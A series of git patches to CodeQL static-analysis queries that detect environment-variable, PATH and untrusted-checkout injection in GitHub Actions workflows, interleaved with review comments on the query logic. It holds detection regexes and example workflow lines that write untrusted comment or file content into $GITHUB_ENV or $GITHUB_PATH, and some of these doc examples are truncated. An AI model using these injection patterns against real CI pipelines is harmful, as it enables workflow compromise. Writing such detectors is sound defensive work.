+class ActorControlCheck extends ControlCheck {
+ ActorControlCheck() {
+ // eg: github.actor == 'dependabot[bot]'
+ // eg: github.triggering_actor == 'CI Agent'
+ // eg: github.event.pull_request.user.login == 'mybot'
+ exists(
+ normalizeExpr(this.getCondition())
+ .regexpFind([
+ "\\bgithub\\.actor\\b", "\\bgithub\\.triggering_actor\\b",
+ "\\bgithub\\.event\\.comment\\.user\\.login\\b",
+ "\\bgithub\\.event\\.pull_request\\.user\\.login\\b",
+ ], _, _)
+ )
+ }
+}
+
+class RepositoryControlCheck extends ControlCheck {
+ RepositoryControlCheck() {
+ // eg: github.repository == 'test/foo'
+ exists(
+ normalizeExpr(this.getCondition())
+ .regexpFind(["\\bgithub\\.repository\\b", "\\bgithub\\.repository_owner\\b",], _, _)
+ )
+ }
+}
+
+class AssociationControlCheck extends ControlCheck {
+ AssociationControlCheck() {
+ // eg: contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association)
+ exists(
+ normalizeExpr(this.getCondition())
+ .regexpFind([
+ "\\bgithub\\.event\\.comment\\.author_association\\b",
+ "\\bgithub\\.event\\.issue\\.author_association\\b",
+ "\\bgithub\\.event\\.pull_request\\.author_association\\b",
+ ], _, _)
+ )
+ }
+}
+
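Review bot: `dominates` treats an `if:` on any step of a needed job as guarding the dependent job's steps (`step.getEnclosingJob().getANeededJob().(LocalJob).getAStep().getIf() = this`), but a false step-level condition only skips that one step; the needed job still succeeds and the dependent job still runs, so that check does not gate `step` unless the condition sits on the job itself. Unless the failure path is modelled elsewhere, this disjunct suppresses alerts for checkouts that are not actually protected; drop it, or document it as a known over-approximation. The predicate also has no QLDoc, e.g. `/** Holds if `step` can only execute after this check evaluated true: the check is the step's own condition, its job's condition, or a condition on a job it depends on. */`, and each subclass would benefit from one line stating which contexts it recognises, since the regex lists are the only specification. The code is moved verbatim from UntrustedCheckoutQuery.qll (deleted below), so the point predates this commit.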
diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll
index 90b0a74d0ece..fcccc5d8a14a 100644
--- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll
+++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll
@@ -233,66 +233,3 @@ class GhSHACheckout extends SHACheckoutStep instanceof Run { ) } } - -/** An If node that contains an actor, user or label check */ -abstract class ControlCheck extends If { - predicate dominates(Step step) { - step.getIf() = this or - step.getEnclosingJob().getIf() = this or - step.getEnclosingJob().getANeededJob().(LocalJob).getAStep().getIf() = this or - step.getEnclosingJob().getANeededJob().(LocalJob).getIf() = this - } -} - -class LabelControlCheck extends ControlCheck { - LabelControlCheck() { - // eg: contains(github.event.pull_request.labels.*.name, 'safe to test') - // eg: github.event.label.name == 'safe to test' - exists( - normalizeExpr(this.getCondition()) - .regexpFind([ - "\\bgithub\\.event\\.pull_request\\.labels\\b", "\\bgithub\\.event\\.label\\.name\\b" - ], _, _) - ) - } -} - -class ActorControlCheck extends ControlCheck { - ActorControlCheck() { - // eg: github.actor == 'dependabot[bot]' - // eg: github.triggering_actor == 'CI Agent' - // eg: github.event.pull_request.user.login == 'mybot' - exists( - normalizeExpr(this.getCondition()) - .regexpFind([ - "\\bgithub\\.actor\\b", "\\bgithub\\.triggering_actor\\b", - "\\bgithub\\.event\\.comment\\.user\\.login\\b", - "\\bgithub\\.event\\.pull_request\\.user\\.login\\b", - ], _, _) - ) - } -} - -class RepositoryControlCheck extends ControlCheck { - RepositoryControlCheck() { - // eg: github.repository == 'test/foo' - exists( - normalizeExpr(this.getCondition()) - .regexpFind(["\\bgithub\\.repository\\b", "\\bgithub\\.repository_owner\\b",], _, _) - ) - } -} - -class AssociationControlCheck extends ControlCheck { - AssociationControlCheck() { - // eg: contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) - exists( - normalizeExpr(this.getCondition()) - .regexpFind([ - "\\bgithub\\.event\\.comment\\.author_association\\b", - "\\bgithub\\.event\\.issue\\.author_association\\b", - "\\bgithub\\.event\\.pull_request\\.author_association\\b", - ], _, _) - ) 
- } -} diff --git a/ql/src/Security/CWE-285/ImproperAccessControl.ql b/ql/src/Security/CWE-285/ImproperAccessControl.ql index 88ac3cee04db..16ae5c5fe9b5 100644 --- a/ql/src/Security/CWE-285/ImproperAccessControl.ql +++ b/ql/src/Security/CWE-285/ImproperAccessControl.ql @@ -12,6 +12,7 @@ */ import codeql.actions.security.UntrustedCheckoutQuery +import codeql.actions.security.ControlChecks from LocalJob job, LabelControlCheck check, MutableRefCheckoutStep checkout, Event event where diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql index ff9148ab5833..3a049f67dea7 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql @@ -14,6 +14,7 @@ import actions import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps +import codeql.actions.security.ControlChecks from ControlCheck check, MutableRefCheckoutStep checkout where diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql index ca1b855c6ece..b9a1e4c6301a 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql @@ -14,6 +14,7 @@ import actions import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps +import codeql.actions.security.ControlChecks from ControlCheck check, MutableRefCheckoutStep checkout where diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql index 9f7f3fd8ceef..3a87b30be970 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql 
@@ -16,6 +16,7 @@ import actions import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps +import codeql.actions.security.ControlChecks query predicate edges(Step a, Step b) { a.getAFollowingStep() = b } diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql index 980560dac9a3..cb2f1cdaf95f 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql @@ -16,6 +16,7 @@ import actions import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps +import codeql.actions.security.ControlChecks from LocalJob j, PRHeadCheckoutStep checkout where diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql b/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql index 89d2e7413067..3edde8dcf547 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql @@ -16,6 +16,7 @@ import actions import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps +import codeql.actions.security.ControlChecks from LocalJob j, PRHeadCheckoutStep checkout where From a9ea9a1f8a7e781e072de04ab682db08111daa6a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 27 Jun 2024 22:53:32 +0200 Subject: [PATCH 366/707] Update expected test files --- .../Security/CWE-829/UntrustedCheckoutCritical.expected | 1 + 1 file changed, 1 insertion(+) diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 57efc8af35dc..5f4ba7a7b98f 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected 
@@ -313,6 +313,7 @@ edges | .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/workflow_run_untrusted_checkout.yml:16:9:18:31 | Uses Step | #select | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | +| .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | From 40a6f3bbee8348d2b2f0e66b510236bcd91b1ec7 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 27 Jun 2024 22:53:55 +0200 Subject: [PATCH 367/707] Make EnvVar and Path injection equivalent --- .../security/EnvPathInjectionQuery.qll | 5 ++- .../actions/security/EnvVarInjectionQuery.qll | 39 ++++++++++++------- 2 files changed, 29 insertions(+), 15 deletions(-) diff --git a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll index cd049cccf4ed..453966f01017 100644 --- a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll 
+++ b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll @@ -15,7 +15,8 @@ class EnvPathInjectionFromFileReadSink extends EnvPathInjectionSink { writeToGitHubPath(run, value) and // (eg: echo DATABASE_SHA=`yq '.creationMetadata.sha' codeql-database.yml` >> $GITHUB_ENV) value - .regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<", "jq\\s+", "yq\\s+"] + ".*" + ["`", "\\)"]) + .regexpMatch(["\\$\\(", "`"] + + ["cat\\s+", "<", "jq\\s+", "yq\\s+", "tail\\s+", "head\\s+"] + ".*" + ["`", "\\)"]) ) } } @@ -31,7 +32,7 @@ class EnvPathInjectionFromFileReadSink extends EnvPathInjectionSink { class EnvPathInjectionFromEnvVarSink extends EnvPathInjectionSink { EnvPathInjectionFromEnvVarSink() { exists(Run run, Expression expr, string var_name, string value | - this.asExpr().getInScopeEnvVarExpr(var_name) = expr and + run.getInScopeEnvVarExpr(var_name) = expr and run.getScriptScalar() = this.asExpr() and writeToGitHubPath(run, value) and ( diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index a692c6e58741..a78963086e1a 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll @@ -7,18 +7,6 @@ import codeql.actions.DataFlow abstract class EnvVarInjectionSink extends DataFlow::Node { } -class EnvVarInjectionFromEnvVarSink extends EnvVarInjectionSink { - EnvVarInjectionFromEnvVarSink() { - exists(Run run, Expression expr, string var_name, string content, string value | - expr = run.getInScopeEnvVarExpr(var_name) and - writeToGitHubEnv(run, content) and - extractVariableAndValue(content, _, value) and - run.getScriptScalar() = this.asExpr() and - value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") - ) - } -} - class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { EnvVarInjectionFromFileReadSink() { exists(Run run, UntrustedArtifactDownloadStep step, string content, string value | 
@@ -28,7 +16,32 @@ class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { extractVariableAndValue(content, _, value) and // (eg: echo DATABASE_SHA=`yq '.creationMetadata.sha' codeql-database.yml` >> $GITHUB_ENV) value - .regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<", "jq\\s+", "yq\\s+"] + ".*" + ["`", "\\)"]) + .regexpMatch(["\\$\\(", "`"] + + ["cat\\s+", "<", "jq\\s+", "yq\\s+", "tail\\s+", "head\\s+"] + ".*" + ["`", "\\)"]) + ) + } +} + +/** + * Holds if a Run step declares an environment variable, uses it to declare env var. + * e.g. + * env: + * BODY: ${{ github.event.comment.body }} + * run: | + * echo "FOO=$BODY" >> $GITHUB_ENV + */ +class EnvVarInjectionFromEnvVarSink extends EnvVarInjectionSink { + EnvVarInjectionFromEnvVarSink() { + exists(Run run, Expression expr, string var_name, string content, string value | + run.getInScopeEnvVarExpr(var_name) = expr and + run.getScriptScalar() = this.asExpr() and + writeToGitHubEnv(run, content) and + extractVariableAndValue(content, _, value) and + ( + value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") + or + value.matches("$(echo %") and value.indexOf(var_name) > 0 + ) ) } } From a485528ebe2eb2f0ca7be747f38ac559edc4fb89 Mon Sep 17 00:00:00 2001 
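Review bot: The new disjunct `value.matches("$(echo %") and value.indexOf(var_name) > 0` is a bare substring test: with `var_name = "BODY"` it also accepts `$(echo $PR_BODY)` or `$(echo BODY)`, and it never requires a `$` before the name, so it does not establish that the variable is expanded at all. The preceding `value.matches("%$" + ["", "{", "ENV{"] + var_name + "%")` already covers `$(echo $BODY)`, `$(echo "${BODY}")` and similar, so the clause mostly adds false positives. Drop it, or tighten it to something like `value.regexpMatch("\\$\\(echo .*\\$\\{?" + var_name + "\\b.*")` (sketch; env var names contain no regex metacharacters). The same construction is repeated in envToRunFlow in FlowSteps.qll in the next commit, for both `var_name` and `var2_name`.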
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 28 Jun 2024 12:31:43 +0200 Subject: [PATCH 368/707] Refactor bash script parsing to improve coverage of env var injection --- ql/lib/codeql/actions/Helper.qll | 11 +++ ql/lib/codeql/actions/dataflow/FlowSteps.qll | 92 +++++++++++++++---- .../security/EnvPathInjectionQuery.qll | 27 +++--- .../actions/security/EnvVarInjectionQuery.qll | 29 +++--- .../actions/security/PoisonableSteps.qll | 16 ++-- ql/lib/ext/config/poisonable_steps.yml | 12 +-- .../CWE-077/.github/workflows/test6.yml | 28 ++++++ .../CWE-077/EnvVarInjectionCritical.expected | 12 +++ .../CWE-077/EnvVarInjectionMedium.expected | 9 ++ 9 files changed, 172 insertions(+), 64 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/test6.yml diff --git a/ql/lib/codeql/actions/Helper.qll b/ql/lib/codeql/actions/Helper.qll index 401ba89eca77..72dc7bf16878 100644 --- a/ql/lib/codeql/actions/Helper.qll +++ b/ql/lib/codeql/actions/Helper.qll @@ -235,3 +235,14 @@ predicate inNonPrivilegedJob(AstNode node) { not j.isPrivilegedExternallyTriggerable() ) } + +bindingset[snippet] +predicate outputsPartialFileContent(string snippet) { + // e.g. + // echo FOO=`yq '.foo' foo.yml` >> $GITHUB_ENV + // echo "FOO=$(> $GITHUB_ENV + // yq '.foo' foo.yml >> $GITHUB_PATH + // cat foo.txt >> $GITHUB_PATH + snippet + .regexpMatch(["(\\$\\(|`)<.*", ".*(\\b|^|\\s+)" + ["cat\\s+", "jq\\s+", "yq\\s+", "tail\\s+", "head\\s+", "ls\\s+"] + ".*"]) +} diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index 4f4d80cc11bb..caa09e9c7e28 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll 
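Review bot: The third example in the comment, `echo "FOO=$(> $GITHUB_ENV`, is truncated (the `$(<file)` form it presumably illustrated lost its `<file)`), and the same truncated example reappears in the new QLDoc of EnvVarInjectionFromFileReadSink in EnvVarInjectionQuery.qll in this commit; restore both as `echo "FOO=$(<foo.txt)" >> $GITHUB_ENV`. The predicate is also looser than the regexes it replaces: the old pattern required the command inside `$(…)` or backticks with a closing delimiter, whereas `.*(\\b|^|\\s+)cat\\s+.*` fires on the word anywhere in the value, including literal text such as `echo "MSG=please cat the log" >> $GITHUB_ENV` (constructed example). If the widening to bare `cat foo.txt >> $GITHUB_PATH` is intended, say so in a QLDoc header, which is missing, e.g. `/** Holds if `snippet` contains a command (cat, jq, yq, head, tail, ls or a `$(<file)` read) whose output comes from a local file. */`.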
@@ -23,6 +23,60 @@ class AdditionalTaintStep extends Unit { abstract predicate step(DataFlow::Node node1, DataFlow::Node node2); } +/** + * Holds if an env var is passed to a Run step and this Run step, writes its value to a special workflow file. + * - file is the name of the special workflow file: GITHUB_ENV, GITHUB_OUTPUT, GITHUB_PATH + * - var_name is the name of the env var + * - run is the Run step + * - key is the name assigned in the special workflow file. + * e.g. FOO for `echo "FOO=$BODY" >> $GITHUB_ENV` + * e.g. FOO for `echo "FOO=$(echo $BODY)" >> $GITHUB_OUTPUT` + * e.g. path (special name) for `echo "$BODY" >> $GITHUB_PATH` + */ +bindingset[var_name] +predicate envToRunFlow(string file, string var_name, Run run, string key) { + exists(string content, string value | + ( + file = "GITHUB_ENV" and + writeToGitHubEnv(run, content) and + extractVariableAndValue(content, key, value) + or + file = "GITHUB_OUTPUT" and + writeToGitHubOutput(run, content) and + extractVariableAndValue(content, key, value) + or + file = "GITHUB_PATH" and + writeToGitHubPath(run, content) and + key = "path" and + value = content + ) and + ( + // e.g. echo "FOO=$BODY" >> $GITHUB_ENV + // e.g. echo "FOO=${BODY}" >> $GITHUB_ENV + value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") + or + // e.g. echo "FOO=$(echo $BODY)" >> $GITHUB_ENV + value.matches("$(echo %") and value.indexOf(var_name) > 0 + or + // e.g. 
+ // FOO=$(echo $BODY) + // echo "FOO=$FOO" >> $GITHUB_ENV + exists(string line, string var2_name, string var2_value | + run.getScript().splitAt("\n") = line + | + var2_name = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 1) and + var2_value = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 2) and + var2_value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") and + ( + value.matches("%$" + ["", "{", "ENV{"] + var2_name + "%") + or + value.matches("$(echo %") and value.indexOf(var2_name) > 0 + ) + ) + ) + ) +} + /** * Holds if a Run step declares an environment variable, uses it in its script to set another env var. * e.g. @@ -32,20 +86,10 @@ class AdditionalTaintStep extends Unit { * echo "foo=$(echo $BODY)" >> $GITHUB_ENV */ predicate envToRunStep(DataFlow::Node pred, DataFlow::Node succ) { - exists(Run run, string var_name, string content, string value | + exists(Run run, string var_name | run.getInScopeEnvVarExpr(var_name) = pred.asExpr() and - succ.asExpr() = run.getScriptScalar() - | - ( - writeToGitHubEnv(run, content) or - writeToGitHubOutput(run, content) - ) and - extractVariableAndValue(content, _, value) and - value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") - or - writeToGitHubPath(run, content) and - value = content and - value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") + succ.asExpr() = run.getScriptScalar() and + envToRunFlow(["GITHUB_ENV", "GITHUB_PATH"], var_name, run, _) ) } 
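Review bot: The intermediate-assignment case only recognises lines that are exactly `NAME=value`: `regexpCapture` matches the whole line against `([a-zA-Z0-9\\-_]+)=(.*)`, so an indented assignment inside an `if`/loop body, `export FOO=$BODY`, or a line with trailing whitespace is skipped silently and the flow through it is lost. Widening the pattern to `"\\s*(?:export\\s+)?([a-zA-Z0-9\\-_]+)=(.*)"` for both captures covers the common shell forms, and binding the literal once (`string assign = "..."`) keeps the two captures from drifting apart. The QLDoc above the predicate should also state that only one hop through an intermediate variable is followed, which is what the code does. The `$(echo …)` substring check used here was already raised on EnvVarInjectionFromEnvVarSink in the previous commit.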
@@ -63,16 +107,26 @@ predicate envToRunStep(DataFlow::Node pred, DataFlow::Node succ) { * echo "::set-output name=step-output::$BODY" */ predicate envToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { - exists(Run run, string var_name, string content, string key, string value | - writeToGitHubOutput(run, content) and - extractVariableAndValue(content, key, value) and - c = any(DataFlow::FieldContent ct | ct.getName() = key) and - pred.asExpr() = run.getInScopeEnvVarExpr(var_name) and + exists(Run run, string var_name, string key | + run.getInScopeEnvVarExpr(var_name) = pred.asExpr() and succ.asExpr() = run and - value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") + envToRunFlow("GITHUB_OUTPUT", var_name, run, key) and + c = any(DataFlow::FieldContent ct | ct.getName() = key) ) } +// predicate dISABLEDenvToOutputStoreStep( +// DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c +// ) { +// exists(Run run, string var_name, string content, string key, string value | +// writeToGitHubOutput(run, content) and +// extractVariableAndValue(content, key, value) and +// c = any(DataFlow::FieldContent ct | ct.getName() = key) and +// pred.asExpr() = run.getInScopeEnvVarExpr(var_name) and +// succ.asExpr() = run and +// value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") +// ) +// } predicate envToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { exists(Run run, string var_name, string content, string key, string value | writeToGitHubEnv(run, content) and diff --git a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll index 453966f01017..cbdf9a917ce9 100644 --- a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll 
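Review bot: The commented-out `dISABLEDenvToOutputStoreStep` block duplicates the previous body of envToOutputStoreStep, which the live predicate directly above now expresses through envToRunFlow; git already keeps that history, so the thirteen comment lines are noise that will drift from the real implementation. Delete them, or if they are kept on purpose as a reference, say why in one line above them. The QLDoc of envToOutputStoreStep (which begins above the hunk) should also mention that `c` is now the field named by the key that envToRunFlow extracts from the `$GITHUB_OUTPUT` write.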
@@ -1,22 +1,26 @@ private import actions private import codeql.actions.TaintTracking private import codeql.actions.dataflow.ExternalFlow -import codeql.actions.dataflow.FlowSources private import codeql.actions.security.ArtifactPoisoningQuery +private import codeql.actions.dataflow.FlowSteps import codeql.actions.DataFlow +import codeql.actions.dataflow.FlowSources abstract class EnvPathInjectionSink extends DataFlow::Node { } +/** + * Holds if a Run step declares a PATH environment variable with contents from a local file. + * e.g. + * run: | + * cat foo.txt >> $GITHUB_PATH + */ class EnvPathInjectionFromFileReadSink extends EnvPathInjectionSink { EnvPathInjectionFromFileReadSink() { exists(Run run, UntrustedArtifactDownloadStep step, string value | this.asExpr() = run.getScriptScalar() and step.getAFollowingStep() = run and writeToGitHubPath(run, value) and - // (eg: echo DATABASE_SHA=`yq '.creationMetadata.sha' codeql-database.yml` >> $GITHUB_ENV) - value - .regexpMatch(["\\$\\(", "`"] + - ["cat\\s+", "<", "jq\\s+", "yq\\s+", "tail\\s+", "head\\s+"] + ".*" + ["`", "\\)"]) + outputsPartialFileContent(value) ) } } @@ -31,15 +35,10 @@ class EnvPathInjectionFromFileReadSink extends EnvPathInjectionSink { */ class EnvPathInjectionFromEnvVarSink extends EnvPathInjectionSink { EnvPathInjectionFromEnvVarSink() { - exists(Run run, Expression expr, string var_name, string value | - run.getInScopeEnvVarExpr(var_name) = expr and - run.getScriptScalar() = this.asExpr() and - writeToGitHubPath(run, value) and - ( - value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") - or - value.matches("$(echo %") and value.indexOf(var_name) > 0 - ) + exists(Run run, string var_name | + envToRunFlow("GITHUB_PATH", var_name, run, _) and + exists(run.getInScopeEnvVarExpr(var_name)) and + run.getScriptScalar() = this.asExpr() ) } } 
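Review bot: Replacing the inline regex with `outputsPartialFileContent(value)` in EnvPathInjectionFromFileReadSink drops the only comment that documented which commands were meant (`cat`, `<`, `jq`, `yq`, `tail`, `head` inside `$(...)` or backticks) together with its example, and the helper's definition is not part of this diff, so a reader of this file can no longer tell whether `$(<file)` style reads are still covered. Keep an example in the class QLDoc, e.g. `* echo DATABASE_SHA=$(yq '.creationMetadata.sha' codeql-database.yml) >> $GITHUB_PATH`, and confirm the helper matches the same command list. The same replacement is made in EnvVarInjectionQuery.qll (EnvVarInjectionFromFileReadSink) and in PoisonableSteps.qll (EnvVarInjectionFromFileReadRunStep), where the removed pattern was the different `ls `/`cat `/`jq `/`$(<` list, so one helper now has to cover the union of both. The new class QLDoc also uses predicate wording (`Holds if a Run step ...`); for a class the usual form is `A Run step that declares ...`.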
diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index a78963086e1a..5a3dbebc5123 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll @@ -1,12 +1,20 @@ private import actions private import codeql.actions.TaintTracking private import codeql.actions.dataflow.ExternalFlow -import codeql.actions.dataflow.FlowSources private import codeql.actions.security.ArtifactPoisoningQuery +private import codeql.actions.dataflow.FlowSteps import codeql.actions.DataFlow +import codeql.actions.dataflow.FlowSources abstract class EnvVarInjectionSink extends DataFlow::Node { } +/** + * Holds if a Run step declares an environment variable with contents from a local file. + * e.g. + * run: | + * echo "sha=$(cat test-results/sha-number)" >> $GITHUB_ENV + * echo "sha=$(> $GITHUB_ENV + */ class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { EnvVarInjectionFromFileReadSink() { exists(Run run, UntrustedArtifactDownloadStep step, string content, string value | @@ -14,10 +22,7 @@ class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { step.getAFollowingStep() = run and writeToGitHubEnv(run, content) and extractVariableAndValue(content, _, value) and - // (eg: echo DATABASE_SHA=`yq '.creationMetadata.sha' codeql-database.yml` >> $GITHUB_ENV) - value - .regexpMatch(["\\$\\(", "`"] + - ["cat\\s+", "<", "jq\\s+", "yq\\s+", "tail\\s+", "head\\s+"] + ".*" + ["`", "\\)"]) + outputsPartialFileContent(value) ) } } 
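Review bot: The second example in the new QLDoc of EnvVarInjectionFromFileReadSink, `echo "sha=$(> $GITHUB_ENV`, is not a complete shell fragment; if it is meant to show the `$(< file)` redirection form it should read `echo "sha=$(<test-results/sha-number)" >> $GITHUB_ENV`. The same truncated string appears in the comment removed from PoisonableSteps.qll in this commit, so if the truncation is only an artifact of how this diff was rendered the committed text should still be checked, because a doc example that cannot be run is worse than none.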
@@ -32,16 +37,10 @@ class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { */ class EnvVarInjectionFromEnvVarSink extends EnvVarInjectionSink { EnvVarInjectionFromEnvVarSink() { - exists(Run run, Expression expr, string var_name, string content, string value | - run.getInScopeEnvVarExpr(var_name) = expr and - run.getScriptScalar() = this.asExpr() and - writeToGitHubEnv(run, content) and - extractVariableAndValue(content, _, value) and - ( - value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") - or - value.matches("$(echo %") and value.indexOf(var_name) > 0 - ) + exists(Run run, string var_name | + envToRunFlow("GITHUB_ENV", var_name, run, _) and + exists(run.getInScopeEnvVarExpr(var_name)) and + run.getScriptScalar() = this.asExpr() ) } } diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll index d9978b2a4239..4165df17a4d8 100644 --- a/ql/lib/codeql/actions/security/PoisonableSteps.qll +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll @@ -18,7 +18,7 @@ class PoisonableCommandStep extends PoisonableStep, Run { PoisonableCommandStep() { exists(string regexp | poisonableCommandsDataModel(regexp) and - exists(this.getScript().splitAt("\n").trim().regexpFind("([^a-z]|^)" + regexp, _, _)) + exists(this.getScript().splitAt("\n").trim().regexpFind("(^|\\b|\\s+)" + regexp, _, _)) ) } } @@ -29,7 +29,7 @@ class LocalScriptExecutionRunStep extends PoisonableStep, Run { LocalScriptExecutionRunStep() { exists(string line, string regexp, int group | line = this.getScript().splitAt("\n").trim() | poisonableLocalScriptsDataModel(regexp, group) and - cmd = line.regexpCapture(regexp, group) + cmd = line.regexpCapture("(^|\\b|\\s+)" + regexp, group) ) } 
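Review bot: The new anchor `"(^|\\b|\\s+)"` in LocalScriptExecutionRunStep no longer matches a local script that follows a separator without whitespace: in `cd dir;./run.sh` there is no word boundary between `;` and `.`, so the `(\\.\\/)(.*)` pattern from poisonable_steps.yml, which loses its `;\\s*` alternative in the same commit, cannot fire, whereas the old `(^|;\\s*|\\s+)` prefix did. Keeping the separator inside the single prefix group preserves the group numbering the data model relies on: `cmd = line.regexpCapture("(^|\\b|\\s+|;\\s*)" + regexp, group)`. PoisonableCommandStep above it is only affected if an entry in poisonableCommandsDataModel starts with a non-word character, since `\\b` does match between `;` and a letter, but the old `([^a-z]|^)` accepted that case too.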
